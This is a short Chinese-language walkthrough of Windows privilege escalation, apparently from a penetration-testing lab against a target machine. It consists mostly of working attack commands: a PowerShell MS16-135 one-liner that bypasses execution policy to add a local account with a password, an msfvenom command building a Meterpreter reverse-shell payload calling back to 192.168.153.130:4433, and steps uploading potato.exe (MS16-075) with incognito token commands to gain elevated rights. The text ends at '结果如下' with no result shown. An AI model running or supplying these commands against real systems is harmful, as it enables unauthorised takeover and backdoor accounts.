利用windows-exploit-suggester.py脚本,查找系统未打补丁有哪些,脚本下载地址:https://github.com/AonCyberLabs/Windows-Exploit-Suggester
利用ms16-135内核漏洞提权,
powershell -nop -exec bypass -c "& {Import-Module 'C:\Users
\123\Desktop\MS16-135.ps1';Invoke-MS16-135 -Application cmd.exe -commandline '/c net user HELPS amin!@#45 /add'}",执行完成后可成功添加账户
利用ms16-075提权
- 生成msf生成反弹木马
msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.153.130 LPORT=4433 -f exe -o 4433.exe
- 将反弹木马上传到靶机,执行后,msf反弹会shell,可见当前用户权限为iis
- 上传potato.exe到靶机
potato.exe下载地址:
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
dir可看到potato.exe已在靶机目录中
- 执行potato.exe
list_tokens –g 列出目标主机用户组的可用令牌
use incognito 加载incognito功能
list_tokens –u 列出目标主机用户的可用令牌
execute -cH -f potato.exe
成功提权,结果如下